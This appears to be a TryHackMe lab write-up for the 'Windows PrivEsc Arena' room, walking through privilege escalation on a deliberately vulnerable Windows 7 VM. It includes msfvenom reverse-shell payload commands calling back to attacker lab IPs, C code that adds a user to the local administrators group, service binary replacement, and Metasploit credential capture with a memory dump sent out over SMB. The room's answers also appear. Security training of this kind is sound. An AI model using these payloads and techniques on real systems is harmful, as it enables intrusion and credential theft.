Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
THM Room https://tryhackme.com/room/windowsprivescarena
TASK 1 : Connecting to TryHackMe network
I’ve read the intro and deployed the attached virtual machine.
No Answer
TASK 2 : Deploy the vulnerable machine
Deploy the machine and log into the user account via RDP
No Answer
Open a command prompt and run ‘net user’. Who is the other non-default user on the machine?
Answer : TCM
TASK 3 : Registry Escalation - Autorun
Click ‘Completed’ once you have successfully elevated the machine
First, i looked at autoruns64.exe for “program.exe”, then i checked with accesschk that the group “Everyone” has the “FILE_ALL_ACCESS” permission :
After building a program.exe reverse with msfvenom on the attacker machine :
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.135.148 -f exe -o program.exe
I uploaded this in the “C:\Program Files\Autorun Program” directory. (Via python3 HTTP server on attacker)
Then launched a handler in Metasploit and relogged to an admin session to simulate an adminsitrator connexion :
I got an active meterpreter session. Let’s checked ithe user groups :
No Answer.
TASK 4 : Registry Escalation - AlwaysInstallElevated
Click ‘Completed’ once you have successfully elevated the machine
First, looking the registry key is well set to 1 :
AlwaysInstallElevated Registry Key
Then creating a msi reverse shell installer with msfvenom :
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.199.49 lport=4545 -f msi -o setup.msi
With a simle HTTP python Server , i downloaded the file on the target then ran the command :
In the Metasploit listener previously launched, i receive a shell with system rights :
No Answer.
TASK 5 : Service Escalation - Registry
Click ‘Completed’ once you have successfully elevated the machine
Compiled the c code with the changes to the system function into x.exe :
1
2
3
4
5
6
7
8
9
[...]
//add the payload here
int Run()
{
//system("whoami > c:\\windows\\temp\\service.txt");
system("cmd.exe /k net localgroup administrators user /add");
return 0;
}
[...]
Then adding x.exe on target and launching the service :
We can see that our local user has been added to the local administrators group.
No Answer.
TASK 6 : Service Escalation - Executable Files
Click ‘Completed’ once you have successfully elevated the machine
Detection of vulnerability :
The filepermservice.exe file has “FILE_ALL_ACCESS” permission for Everyone set.
Exploitation : Using the x.exe file used previously, and copied it to filepermservice.exe to replace it.
1
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
Then starting the service :
1
sc start filepermsvc
We now have the user added to the local administrators group :
No Answer
TASK 7 : Privilege Escalation - Startup Applications
Click ‘Completed’ once you have successfully elevated the machine
New payload generated :
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.199.49 LPORT=53 -f exe -o x.exe
Detection :
Users has F (full access) persmission on the Startup folder as intended.
Exploitation :
Let’s download our new exe file to this folder.
Then when logged to an admin user, i received a privileges shell :
No Answer
TASK 8 : Service Escalation - DLL Hijacking
Click ‘Completed’ once you have successfully elevated the machine
First, i created the modified dll from the given file :
Then restarted the dllsvc service :
No Answer.
TASK 9 : Service Escalation - binPath
Click ‘Completed’ once you have successfully elevated the machine
First, checked that the user has the “SERVICE_CHANGE_CONFIG” permission set :
Then adding our user to local admin group :
No Answer
TASK 10 : Service Escalation - Unquoted Service Paths
Click ‘Completed’ once you have successfully elevated the machine
Checking i can exploit an unquoted path :
Built a exe file adding user to local admin group :
Launching the exploit :
No Answer
TASK 11 : Potato Escalation - Hot Potato
Click ‘Completed’ once you have successfully elevated the machine
“Hot potato is the code name of a Windows privilege escalation technique that was discovered by Stephen Breen. This technique is actually a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.” _pentesterlab.blog https://pentestlab.blog/2017/04/13/hot-potato/
Executing the provide script for Hot Potato exploit :
It added our user to the local adminsitrator group.
No Answer.
TASK 12 : Password Mining Escalation - Configuration Files
What is the cleartext password found in Unattend.xml?
Unexpected password found in xml configuration file :
It’s base64 encode, so i need to decode it :
Answer : password123
TASK 13 : Password Mining Escalation - Memory
Click ‘Completed’ once you have successfully found all the passwords
Started msfconsole and used following commands :
1
2
3
4
use auxiliary/server/capture/http_basic
set uripath x
set SRVPORT 8888
run
Then i explored on the windows target http://10.10.199.49:8888/x and got an error while connecting. So, i created a dump file from the internet explorer via the Taskmanager :
Next i ran a smb server on kali :
1
sudo python3 /opt/impackets/examples/smbserver.py kali .
so i could transfert the dump files from Windows to the Kali machine :
The command strings didn’t return anything :
1
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
But in the Metasploit capture, i got the password captured :
No Answer
TASK 14 : Privilege Escalation - Kernel Exploits
Click ‘Completed’ once you have successfully elevated the machine
The msfvenom payload kept crashing for me, event changing settings like encoder or architecture.
When the reverse shell was established, it instantly died.
No Answer